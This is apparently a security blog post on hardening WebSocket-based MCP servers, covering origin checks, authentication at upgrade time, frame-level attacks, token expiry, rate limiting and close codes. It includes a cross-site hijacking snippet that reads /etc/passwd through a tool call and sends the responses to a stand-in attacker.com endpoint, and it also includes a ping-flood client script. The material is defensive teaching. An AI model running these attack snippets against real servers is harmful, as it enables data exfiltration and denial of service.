MCP Server WebSocket Security: Authentication, Message Framing Attacks, and Connection Lifecycle
WebSocket-based MCP servers give up the per-request stateless model that HTTP security is built on. There is no CORS preflight to stop a cross-origin connection, no per-request auth header, and no request-scoped rate limiting. A single upgrade handshake opens a long-lived channel that stays open for hours while an LLM agent makes dozens of tool calls. Every security control needs to be redesigned for this model. This post covers the complete attack surface: cross-site WebSocket hijacking, upgrade-time authentication, message framing attacks, connection lifetime auth drift, and the close sequence.
Why WebSocket breaks the HTTP security model
Most MCP servers start as HTTP servers. Security controls like JWT validation, CORS headers, and per-request rate limiting slot naturally into middleware. The mental model is simple: each request carries credentials, each response is isolated, and the framework rejects malformed requests before they reach your handler code.
WebSocket destroys this model. The initial HTTP Upgrade request is the only HTTP request in the session — everything after that is WebSocket frames over a persistent TCP connection. This means:
- CORS does not apply to WebSocket. The browser does not send a preflight for WebSocket connections. The Origin header is sent, but the browser does not enforce any access control on the response; that is the server's job.
- Cookies are sent on the upgrade request. An attacker-controlled page can open a WebSocket connection to your API, and the browser attaches the user's cookies whenever their SameSite policy allows it. No same-origin check stops the connection.
- Authentication happens once. After the connection is established, you must maintain the auth context in server-side state. If the JWT expires, the WebSocket stays open unless you explicitly enforce a TTL.
- Rate limiting must span the connection lifetime. A single connection can send thousands of messages. Per-connection limits replace per-IP-request limits.
None of these are insurmountable — but they require intentional, WebSocket-specific security design rather than relying on middleware that works for HTTP.
Cross-site WebSocket hijacking (CSWSH)
CSWSH is the WebSocket equivalent of CSRF. An attacker hosts a page at attacker.com that opens a WebSocket connection to your MCP server using the victim's browser credentials. Unlike CSRF, the attacker gets a bidirectional channel: they can read tool responses, not just trigger writes.
The attack requires no special permission from the browser:
// attacker.com/hijack.html
const ws = new WebSocket('wss://api.example.com/mcp');
ws.onmessage = (e) => {
  // full access to tool responses (file reads, search results,
  // and anything else the MCP server returns), exfiltrated to the attacker
  fetch('https://attacker.com/collect', { method: 'POST', body: e.data });
};
ws.onopen = () => {
  // MCP messages are JSON-RPC 2.0, so the request carries jsonrpc and id
  ws.send(JSON.stringify({
    jsonrpc: '2.0',
    id: 1,
    method: 'tools/call',
    params: { name: 'read_file', arguments: { path: '/etc/passwd' } },
  }));
};
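If your MCP server authenticates via cookies (session cookie, OAuth cookie) and the browser attaches them, this request arrives with the victim's cookie and succeeds. SameSite is only a partial defense: cookies set with SameSite=None are sent on cross-site WebSocket handshakes, browsers that do not default to Lax send unmarked cookies as well, and a page on a compromised sibling subdomain counts as same-site, so even SameSite=Strict cookies go along.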
The fix is to validate the Origin header on every upgrade request before completing the handshake:
import { WebSocketServer } from 'ws';
import { createServer } from 'http';

const ALLOWED_ORIGINS = new Set([
  'https://app.example.com',
  'https://claude.ai', // if you support the Claude desktop client
]);

const httpServer = createServer();
const wss = new WebSocketServer({ noServer: true });

httpServer.on('upgrade', (req, socket, head) => {
  const origin = req.headers.origin;
  // Browsers always send Origin on a WebSocket handshake; CLI and server clients usually omit it.
  // This check lets requests with no Origin through, so authentication must stop them instead.
  // If you serve browser clients only, reject a missing Origin as well.
  if (origin !== undefined && !ALLOWED_ORIGINS.has(origin)) {
    socket.write('HTTP/1.1 403 Forbidden\r\n\r\n');
    socket.destroy();
    return;
  }
  // Only upgrade if Origin is acceptable
  wss.handleUpgrade(req, socket, head, (ws) => {
    wss.emit('connection', ws, req);
  });
});
Note on same-site deployments: if your MCP server and your web app share a domain (e.g., both on example.com), Origin validation is still required — a subdomain like sub.example.com with a subdomain takeover vulnerability could initiate a WebSocket connection to api.example.com with a valid same-site origin. Use an explicit allowlist, not a domain-suffix check.
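To make the difference between a suffix check and an explicit allowlist concrete, here is a minimal sketch. The function names and the single allowlisted origin are hypothetical, chosen only for illustration; the point is that a naive suffix test accepts look-alike domains and every subdomain, while an exact match on the normalized origin does not.

```javascript
// Hypothetical allowlist, for illustration only.
const EXACT_ALLOWED_ORIGINS = new Set(['https://app.example.com']);

// Naive check: accepts any origin whose text ends with the domain name.
function suffixCheck(origin) {
  return origin.endsWith('example.com');
}

// Exact check: normalize with the URL parser, then require set membership.
function exactCheck(origin) {
  let parsed;
  try {
    parsed = new URL(origin);
  } catch {
    return false; // not a parseable origin (for example the literal string "null")
  }
  // URL.origin is scheme + host + port, lowercased, with the default port dropped.
  return EXACT_ALLOWED_ORIGINS.has(parsed.origin);
}

console.log(suffixCheck('https://evil-example.com')); // true: look-alike domain slips through
console.log(exactCheck('https://evil-example.com'));  // false
console.log(exactCheck('https://sub.example.com'));   // false: subdomains are not implied
console.log(exactCheck('https://app.example.com'));   // true
```

Every origin that should connect has to be listed explicitly, which is the intended cost of this design.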
Authentication at upgrade time
The most common WebSocket authentication mistake is accepting the connection first and then waiting for the client to send credentials in the first message. This is the "authenticate-on-first-message" pattern and it has a serious problem: the connection holds a file descriptor, a memory allocation, a rate limit slot, and an audit log association, all before you know who the caller is.
An attacker can exhaust server connection limits without ever authenticating by opening thousands of connections and never sending the credential message. And your audit logs will show connection events with no associated identity.
The correct pattern is to authenticate during the HTTP upgrade, before calling handleUpgrade:
import jwt from 'jsonwebtoken';

httpServer.on('upgrade', (req, socket, head) => {
  // Origin check first (CSWSH)
  const origin = req.headers.origin;
  if (origin !== undefined && !ALLOWED_ORIGINS.has(origin)) {
    socket.write('HTTP/1.1 403 Forbidden\r\n\r\n');
    socket.destroy();
    return;
  }

  // Extract token from Authorization header
  // WebSocket clients can set custom headers (ws library: { headers: { Authorization: 'Bearer ...' } })
  // Browser WebSocket API cannot set custom headers: use the Sec-WebSocket-Protocol trick or a query param
  const authHeader = req.headers['authorization'];
  if (!authHeader || !authHeader.startsWith('Bearer ')) {
    socket.write('HTTP/1.1 401 Unauthorized\r\nWWW-Authenticate: Bearer\r\n\r\n');
    socket.destroy();
    return;
  }

  let claims;
  try {
    // Pin the accepted algorithm so the token header cannot choose it.
    // HS256 is an assumption that matches a shared JWT_SECRET; use your issuer's algorithm.
    claims = jwt.verify(authHeader.slice(7), process.env.JWT_SECRET, { algorithms: ['HS256'] });
  } catch {
    socket.write('HTTP/1.1 401 Unauthorized\r\n\r\n');
    socket.destroy();
    return;
  }

  // Authentication passed: upgrade and attach claims to the ws object
  wss.handleUpgrade(req, socket, head, (ws) => {
    ws.authContext = {
      userId: claims.sub,
      scopes: claims.scopes ?? [],
      tokenExp: claims.exp,
      connectedAt: Date.now(),
    };
    wss.emit('connection', ws, req);
  });
});
Browser clients: the browser WebSocket API cannot set custom HTTP headers on the upgrade request. The common workarounds are: (1) send the token as a Sec-WebSocket-Protocol sub-protocol value (misuse of the header, but works in practice), or (2) use a short-lived one-time token in the query string — generate it server-side after full OAuth, pass it in the URL, invalidate it immediately after the WebSocket connects. Never put long-lived tokens in URLs (they appear in server logs and browser history).
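The one-time token workaround can be sketched roughly as follows. This is an illustration under stated assumptions, not a prescribed implementation: the names issueTicket and redeemTicket, the 30-second lifetime, and the in-memory Map are all hypothetical, and a multi-process deployment would need a shared store instead.

```javascript
const { randomBytes } = require('node:crypto');

const TICKET_TTL_MS = 30_000; // assumed lifetime; keep it as short as the client flow allows
const tickets = new Map();    // ticket -> { userId, expiresAt }

// Called by an authenticated HTTP endpoint after the normal OAuth/session check.
function issueTicket(userId, now = Date.now()) {
  const ticket = randomBytes(32).toString('hex'); // unguessable, 256 bits
  tickets.set(ticket, { userId, expiresAt: now + TICKET_TTL_MS });
  return ticket;
}

// Called from the upgrade handler with the value taken from the query string.
// Returns the user ID, or null if the ticket is unknown, already used, or expired.
function redeemTicket(ticket, now = Date.now()) {
  const entry = tickets.get(ticket);
  if (!entry) return null;
  tickets.delete(ticket); // single use: invalidate before doing anything else
  return entry.expiresAt >= now ? entry.userId : null;
}
```

In the upgrade handler, the ticket would be read from the request URL (for example with new URL(req.url, 'http://localhost').searchParams.get('ticket')) and the connection rejected with 401 when redeemTicket returns null. Because the ticket dies on first use, a copy that later turns up in an access log is worthless.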
Message framing attacks
WebSocket uses a binary frame format defined in RFC 6455. Each frame has an opcode (text, binary, continuation, ping, pong, close), a FIN bit indicating whether this is the last fragment, a masking bit, and a payload. Understanding this framing is necessary to understand the attack surface.
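As a rough illustration of that layout, the sketch below decodes the fixed part of a frame header from raw bytes. The function name parseFrameHeader is hypothetical and this is not how the ws library is implemented; it only mirrors the bit positions given in RFC 6455 §5.2.

```javascript
// Opcode names from RFC 6455 section 5.2; any other value is reserved.
const OPCODE_NAMES = {
  0x0: 'continuation', 0x1: 'text', 0x2: 'binary',
  0x8: 'close', 0x9: 'ping', 0xa: 'pong',
};

// bytes: Uint8Array, Buffer, or array of byte values. Returns null if more data is needed.
function parseFrameHeader(bytes) {
  if (bytes.length < 2) return null;
  const fin = (bytes[0] & 0x80) !== 0;    // top bit of byte 0
  const opcode = bytes[0] & 0x0f;         // low nibble of byte 0
  const masked = (bytes[1] & 0x80) !== 0; // top bit of byte 1
  let payloadLength = bytes[1] & 0x7f;    // 7-bit length, or 126/127 as escape values
  let offset = 2;
  if (payloadLength === 126) {
    if (bytes.length < 4) return null;
    payloadLength = bytes[2] * 256 + bytes[3]; // 16-bit big-endian length
    offset = 4;
  } else if (payloadLength === 127) {
    if (bytes.length < 10) return null;
    payloadLength = 0; // 64-bit big-endian length; exact only up to 2^53 in a JS number
    for (let i = 2; i < 10; i++) payloadLength = payloadLength * 256 + bytes[i];
    offset = 10;
  }
  return {
    fin,
    opcode,
    opcodeName: OPCODE_NAMES[opcode] ?? 'reserved',
    masked,
    payloadLength,
    headerLength: offset + (masked ? 4 : 0), // the 4-byte masking key follows the length
  };
}

// The masked "Hello" text frame from the examples in RFC 6455 section 5.7
const hello = Uint8Array.from([0x81, 0x85, 0x37, 0xfa, 0x21, 0x3d, 0x7f, 0x9f, 0x4d, 0x51, 0x58]);
console.log(parseFrameHeader(hello));
```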
Ping flood — exhausting event loop capacity
RFC 6455 §5.5.2 requires an endpoint that receives a Ping frame to send a Pong frame in response. §5.5.3 lets an endpoint that has fallen behind answer only the most recent Ping, but by default the ws library answers each ping it processes and applies no rate limit.
An attacker who has established a WebSocket connection (even an unauthenticated one on a server that doesn't enforce upgrade-time auth) can send thousands of Ping control frames per second. Control frames cannot be fragmented (RFC 6455 §5.5), so each ping is parsed and handled as its own frame. For every one, the ws library emits a ping event and queues a pong, and that event-loop time is taken away from processing data frames.
// Ping flood from attacker: sends raw WebSocket ping frames
// (cannot be demonstrated with the browser WebSocket API, only with the ws library or raw TCP)
const WebSocket = require('ws');
const ws = new WebSocket('wss://target.example.com/mcp');
ws.on('open', () => {
  // Send 1000 ping frames per second
  setInterval(() => {
    for (let i = 0; i < 100; i++) {
      ws.ping();
    }
  }, 100);
});

// SERVER FIX (separate process): count pings per connection and close on a flood
const wss = new WebSocketServer({ noServer: true });
wss.on('connection', (ws) => {
  let pingCount = 0;
  let pingWindowStart = Date.now();
  const MAX_PINGS_PER_MINUTE = 60;
  // By default ws answers every ping itself. Newer ws releases accept an autoPong: false
  // option (check that your installed version supports it); on older versions the only
  // control is to track pings and close on a flood
  ws.on('ping', () => {
    const now = Date.now();
    if (now - pingWindowStart > 60_000) {
      pingCount = 0;
      pingWindowStart = now;
    }
    pingCount++;
    if (pingCount > MAX_PINGS_PER_MINUTE) {
      ws.close(1008, 'Ping rate limit exceeded');
    }
  });
});
Message fragmentation — bypassing per-message size limits
WebSocket messages can be split across multiple frames using the FIN bit. Intermediate frames have FIN=0; the final frame has FIN=1. The ws library reassembles fragmented messages before emitting the message event — meaning your message handler always sees the fully assembled payload, not individual frames.
This matters for size limits. If you enforce a size limit on the raw message data in the message event callback, you are checking the assembled size — which is correct. But you need to also set the maxPayload option on the WebSocketServer, because the ws library applies this limit during reassembly, before emitting the event. Without it, the library uses a default of 100 MB — enough to exhaust memory before your handler code even runs.
// UNSAFE: default maxPayload is 100 MB, so fragmented messages are assembled in memory up to that size
const unsafeWss = new WebSocketServer({ port: 8080 });

// SAFE: set maxPayload to a sane limit; 1 MB is generous for tool calls
// ws library will close the connection with code 1009 if reassembled size exceeds this
const wss = new WebSocketServer({
  noServer: true,
  maxPayload: 1 * 1024 * 1024, // 1 MB
});

// Additional schema-level limit in the message handler
wss.on('connection', (ws) => {
  ws.on('message', (data) => {
    // data is already assembled (ws handles fragmentation)
    if (data.length > 512 * 1024) { // stricter 512 KB application limit, below maxPayload
      ws.close(1009, 'Message too large');
      return;
    }
    let message;
    try {
      message = JSON.parse(data.toString());
    } catch {
      // Malformed JSON must not throw out of the handler and crash the process
      ws.close(1007, 'Invalid JSON'); // 1007: invalid payload data
      return;
    }
    handleMcpMessage(ws, message);
  });
});
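To see why the limit has to be applied during reassembly rather than afterwards, consider this simplified sketch of a fragment assembler. It is not the ws library's implementation; the class name FragmentAssembler and its push method are hypothetical. The running total is checked on every fragment, so an oversized message is rejected before the remaining fragments are buffered.

```javascript
class FragmentAssembler {
  constructor(maxBytes) {
    this.maxBytes = maxBytes;
    this.chunks = [];
    this.total = 0;
  }

  // chunk: Buffer holding one frame's payload; fin: that frame's FIN bit.
  // Returns { done: false } while more fragments are expected,
  // { done: true, payload } on the final fragment,
  // and throws RangeError as soon as the running total exceeds the limit.
  push(chunk, fin) {
    this.total += chunk.length;
    if (this.total > this.maxBytes) {
      this.reset(); // drop what was buffered; the caller should close with 1009
      throw new RangeError('message exceeds limit');
    }
    this.chunks.push(chunk);
    if (!fin) return { done: false };
    const payload = Buffer.concat(this.chunks, this.total);
    this.reset();
    return { done: true, payload };
  }

  reset() {
    this.chunks = [];
    this.total = 0;
  }
}

const assembler = new FragmentAssembler(10);
assembler.push(Buffer.from('hello'), false);
console.log(assembler.push(Buffer.from('world'), true).payload.toString()); // helloworld
```

A check that runs only inside the message handler sees the payload after all of this buffering has already happened, which is why the handler-level limit is a complement to maxPayload and not a replacement.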
Unmasked client frames — proxy desync
RFC 6455 §5.3 requires all frames sent by a client to be masked with a 4-byte masking key. Servers must reject connections that send unmasked frames. Servers must NOT mask frames they send to clients. This asymmetry exists to prevent cache poisoning attacks against intercepting proxies.
The attack vector: a poorly implemented reverse proxy or WebSocket interceptor that fails to properly pass through masking can cause frame desynchronization. The server receives what appears to be a valid frame opcode, but the payload bytes have been XOR'd with the wrong masking key — corrupting tool call parameters or, in worst cases, causing the server to interpret a data frame as a control frame.
The ws library handles masking validation correctly when operating as a server. The risk is in custom WebSocket implementations or in proxy configurations that terminate WebSocket and re-proxy without proper frame handling. Audit any middleware that touches WebSocket frames between the client and your MCP server handler.
// ws library validates masking automatically — you don't need to check this yourself
// BUT: verify your reverse proxy does not re-proxy WebSocket at the HTTP level
// Nginx: use proxy_pass with Upgrade + Connection headers for true WebSocket passthrough
// location /mcp {
// proxy_pass http://localhost:3000;
// proxy_http_version 1.1;
// proxy_set_header Upgrade $http_upgrade;
// proxy_set_header Connection "upgrade";
// # these directives make nginx pass the WebSocket connection through rather than treat it as plain HTTP
// }
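The masking transform itself is a plain XOR with a repeating 4-byte key (RFC 6455 §5.3), which is why a wrong or stale key silently corrupts the payload instead of producing an error. A minimal sketch, with applyMask as a hypothetical helper name:

```javascript
// XOR each payload byte with the masking key byte at position i mod 4.
// The same function both masks and unmasks.
function applyMask(payload, maskingKey) {
  const out = new Uint8Array(payload.length);
  for (let i = 0; i < payload.length; i++) {
    out[i] = payload[i] ^ maskingKey[i % 4];
  }
  return out;
}

// Masked "Hello" payload and key from the examples in RFC 6455 section 5.7
const key = [0x37, 0xfa, 0x21, 0x3d];
const maskedPayload = [0x7f, 0x9f, 0x4d, 0x51, 0x58];

console.log(String.fromCharCode(...applyMask(maskedPayload, key))); // Hello

// A proxy that forwards the payload with a different key yields garbage, not an error
const staleKey = [0x00, 0x00, 0x00, 0x01];
console.log(String.fromCharCode(...applyMask(maskedPayload, staleKey)) === 'Hello'); // false
```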
Connection lifetime and auth drift
An LLM agent session can last hours. A JWT with a 1-hour expiry is issued at upgrade time. Forty-five minutes into the session, the agent is still making tool calls — with a token that expires in 15 minutes. At minute 61, the JWT is expired but the WebSocket connection is still open and the agent is still authenticated, because WebSocket authentication is checked once at upgrade.
This is auth drift: the credential that established the session has expired, but the session lives on. For short-lived tokens (JWTs, OAuth access tokens), this creates a window where a revoked or expired token continues to authorize tool calls.
The solution has two parts: a server-enforced connection TTL, and periodic token validation.
const CONNECTION_TTL_MS = 4 * 60 * 60 * 1000; // 4 hours max per connection
const TOKEN_RECHECK_INTERVAL_MS = 15 * 60 * 1000; // recheck token every 15 min

wss.on('connection', (ws, req) => {
  const auth = ws.authContext;

  // Enforce absolute connection TTL
  const connTtlTimer = setTimeout(() => {
    ws.close(1001, 'Connection TTL exceeded');
  }, CONNECTION_TTL_MS);

  // Periodic check: catches expired tokens on idle connections and revoked credentials
  const recheckTimer = setInterval(() => {
    const nowSec = Math.floor(Date.now() / 1000);
    if (auth.tokenExp && auth.tokenExp < nowSec) {
      ws.close(4001, 'Token expired; reconnect with fresh credentials');
      return;
    }
    // Optional: query a token revocation endpoint or a Redis revocation set
    checkRevocation(auth.userId)
      .then((isRevoked) => {
        if (isRevoked) ws.close(4002, 'Token revoked');
      })
      .catch((err) => {
        // Without this handler a failed lookup becomes an unhandled rejection.
        // Decide deliberately whether a failed check should also close the connection.
        console.error('revocation check failed', err);
      });
  }, TOKEN_RECHECK_INTERVAL_MS);

  ws.on('close', () => {
    clearTimeout(connTtlTimer);
    clearInterval(recheckTimer);
  });

  ws.on('message', async (data) => {
    // Per-message: check token hasn't expired since last message
    const nowSec = Math.floor(Date.now() / 1000);
    if (auth.tokenExp && auth.tokenExp < nowSec) {
      ws.send(JSON.stringify({ error: 'token_expired', message: 'Reconnect with a fresh token' }));
      ws.close(4001, 'Token expired');
      return;
    }
    await handleMcpMessage(ws, data);
  });
});
For long-lived agent sessions, consider adding a token refresh message type to your MCP protocol extension: the client sends an auth/refresh message with a new token, the server validates it and updates ws.authContext.tokenExp, extending the effective session without requiring a full reconnect and re-auth.
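One way the server side of such a refresh could look is sketched below. The function name applyTokenRefresh and the result shape are hypothetical, and the sketch assumes the new token's signature has already been verified (for example with jwt.verify) so that newClaims can be trusted. Replacing the scopes from the fresh token is also an assumption; the alternative is to leave them as granted at upgrade time.

```javascript
// authContext: the object attached to the connection at upgrade time
// newClaims: claims from an already-verified replacement token
function applyTokenRefresh(authContext, newClaims, nowSec = Math.floor(Date.now() / 1000)) {
  // A refresh must never switch the connection to a different user.
  if (newClaims.sub !== authContext.userId) {
    return { ok: false, reason: 'subject_mismatch' };
  }
  // Reject tokens that are missing exp or are already expired.
  if (typeof newClaims.exp !== 'number' || newClaims.exp <= nowSec) {
    return { ok: false, reason: 'expired' };
  }
  authContext.tokenExp = newClaims.exp;
  authContext.scopes = newClaims.scopes ?? []; // assumption: the fresh token is authoritative
  return { ok: true };
}

const ctx = { userId: 'u1', scopes: ['read'], tokenExp: 100 };
console.log(applyTokenRefresh(ctx, { sub: 'u2', exp: 500 }, 200)); // { ok: false, reason: 'subject_mismatch' }
console.log(applyTokenRefresh(ctx, { sub: 'u1', exp: 500 }, 200)); // { ok: true }
```

The absolute connection TTL still applies after a refresh, so a stream of refreshes cannot keep one connection open indefinitely.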
Rate limiting across reconnects
Per-connection rate limits are easy to bypass by reconnecting. With a per-connection limit of 100 calls, an attacker who wants 10,000 tool calls per minute can open and close 100 connections per minute, staying under the limit on each one. Effective rate limiting for WebSocket MCP servers must be tracked per-identity (user ID from the JWT), not per-connection.
// 'your-rate-limiter' is a placeholder: substitute the rate limiting module you actually use
import { RateLimiter } from 'your-rate-limiter';

// Per-user rate limiters, shared across all connections from the same user
const callLimiters = new Map(); // userId → RateLimiter

function getCallLimiter(userId) {
  if (!callLimiters.has(userId)) {
    callLimiters.set(userId, new RateLimiter({
      maxRequests: 200, // 200 tool calls per minute per user
      windowMs: 60_000,
    }));
  }
  return callLimiters.get(userId);
}

// Connection-level rate limiting for upgrade requests: prevents reconnect flooding
// Note: this Map grows with every new IP; evict stale entries periodically in production
const upgradeLimiter = new Map(); // IP → { count, windowStart }
const MAX_UPGRADES_PER_MINUTE_PER_IP = 10;

httpServer.on('upgrade', (req, socket, head) => {
  // Behind a reverse proxy this is the proxy's address; use the forwarded
  // client address from a proxy you trust instead
  const ip = req.socket.remoteAddress;
  const now = Date.now();
  const entry = upgradeLimiter.get(ip) ?? { count: 0, windowStart: now };
  if (now - entry.windowStart > 60_000) {
    entry.count = 0;
    entry.windowStart = now;
  }
  entry.count++;
  upgradeLimiter.set(ip, entry);
  if (entry.count > MAX_UPGRADES_PER_MINUTE_PER_IP) {
    socket.write('HTTP/1.1 429 Too Many Requests\r\n\r\n');
    socket.destroy();
    return;
  }
  // ... rest of upgrade handling
});
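Since the RateLimiter import above is a placeholder, here is a minimal fixed-window limiter keyed by identity, as a sketch of what it might do. The class name FixedWindowLimiter and its methods are hypothetical, and a multi-process deployment would need shared storage such as Redis instead of an in-process Map.

```javascript
class FixedWindowLimiter {
  constructor({ maxRequests, windowMs }) {
    this.maxRequests = maxRequests;
    this.windowMs = windowMs;
    this.windows = new Map(); // key -> { count, windowStart }
  }

  // Returns true if the call is allowed and counts it; false if the key is over its limit.
  tryConsume(key, now = Date.now()) {
    let entry = this.windows.get(key);
    if (!entry || now - entry.windowStart >= this.windowMs) {
      entry = { count: 0, windowStart: now }; // start a fresh window
      this.windows.set(key, entry);
    }
    if (entry.count >= this.maxRequests) return false;
    entry.count++;
    return true;
  }

  // Remove windows that have ended so the Map does not grow without bound.
  prune(now = Date.now()) {
    for (const [key, entry] of this.windows) {
      if (now - entry.windowStart >= this.windowMs) this.windows.delete(key);
    }
  }
}

// One limiter instance shared by every connection; the key is the user ID from the JWT,
// so reconnecting does not reset the count.
const toolCallLimiter = new FixedWindowLimiter({ maxRequests: 200, windowMs: 60_000 });
console.log(toolCallLimiter.tryConsume('user-123')); // true
```

In the message handler this would be called as toolCallLimiter.tryConsume(ws.authContext.userId) before dispatching each tool call, with prune() run on a timer.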
Secure close sequences
WebSocket close frames carry a 2-byte close code and an optional UTF-8 reason string (max 123 bytes, because the 125-byte control frame payload limit includes the code). The reason string is delivered to the client as-is. Do not include error messages, stack traces, user IDs, internal service names, or database error details in the close reason; they are directly visible to the caller.
// UNSAFE: leaks internal error details
ws.close(1011, `Database error: ${dbError.message} (table: users, query: ${sql})`);
// SAFE: client gets a code they can act on, details go to your structured log
logger.error({ event: 'ws_close_error', userId: ws.authContext?.userId, err: dbError });
ws.close(1011, 'Internal error — request ID: ' + requestId); // requestId for correlation only
// Standard close codes (RFC 6455):
// 1000 — normal closure
// 1001 — going away (server restart)
// 1002 — protocol error
// 1003 — unsupported data type
// 1008 — policy violation (auth, rate limit)
// 1009 — message too large
// 1011 — unexpected condition (server error)
// 4000–4999 — application-defined (safe to use)
// Application codes for MCP servers:
// 4001 — token expired (client should reconnect with a fresh token)
// 4002 — token revoked (client should reauth at the OAuth server)
// 4003 — scope insufficient (client requested a tool they don't have permission for)
// 4004 — session limit exceeded (user has too many concurrent connections)
Always send a Close frame rather than abruptly destroying the socket. Abrupt closes (socket destroy without a WebSocket close frame) leave the client unable to distinguish between a server error and a network interruption. Well-coded MCP clients use the close code to decide whether to retry, re-authenticate, or surface an error to the user.
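On the client side, the decision described above might be sketched like this. The function name and the action labels are hypothetical, and the mapping simply follows the close codes listed earlier in this section. Code 1006 is what a client API reports locally when the connection ended without any Close frame, which is the ambiguous case an abrupt destroy produces.

```javascript
// Map a WebSocket close code to what the client should do next.
function actionForCloseCode(code) {
  switch (code) {
    case 1000:
      return 'done'; // normal closure, nothing to do
    case 1001: // going away (server restart, connection TTL)
    case 1011: // server error
    case 4004: // session limit exceeded
      return 'retry_with_backoff';
    case 1006:
      // No Close frame received: could be a crash or a network drop, so retry cautiously
      return 'retry_with_backoff';
    case 4001:
      return 'refresh_token_and_reconnect';
    case 4002:
      return 'reauthenticate';
    case 1008: // policy violation
    case 1009: // message too large
    case 4003: // insufficient scope
      return 'surface_error'; // retrying the same request would fail the same way
    default:
      return 'surface_error';
  }
}

console.log(actionForCloseCode(4001)); // refresh_token_and_reconnect
console.log(actionForCloseCode(1006)); // retry_with_backoff
```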
Complete security checklist for WebSocket MCP servers
Upgrade handler: Origin validation
Check req.headers.origin against an explicit allowlist of known origins before calling wss.handleUpgrade(). Never use a suffix check; require an exact match on the full origin (scheme, host, and port).
Upgrade handler: authenticate before upgrade
Validate JWT or session token during the HTTP upgrade request. Reject unauthenticated connections with 401 before the WebSocket connection is established. Attach auth context (userId, scopes, tokenExp) to the ws object.
WebSocketServer options: maxPayload
Set maxPayload to 1 MB or less. The default is 100 MB — a single fragmented message can exhaust server memory before any handler code runs.
Connection handler: ping rate limiting
Track ping count per connection. Close with code 1008 if ping rate exceeds threshold (e.g., 60 pings/minute). The ws library auto-responds to pings by default; newer releases accept an autoPong: false option, and on versions without it you can only detect the flood and close.
Connection handler: connection TTL and token expiry check
Set a hard connection TTL (e.g., 4 hours) with setTimeout. Check ws.authContext.tokenExp on each message and periodically via setInterval. Close with code 4001 on token expiry.
Rate limiting: per-identity across connections
Track tool call rate per user ID, not per connection. Track upgrade request rate per IP. Reconnect cycling is the primary bypass for per-connection limits.
Close: send Close frames, not destroy()
Always close with ws.close(code, reason). Use application codes 4001–4004 for auth/session events. Do not include error details in the reason string — log them to your structured logger instead.
SkillAudit findings for WebSocket MCP servers
No maxPayload option set on the WebSocketServer. Fragmented messages can be assembled in-memory up to 100 MB before the message handler fires. Grade impact: −10.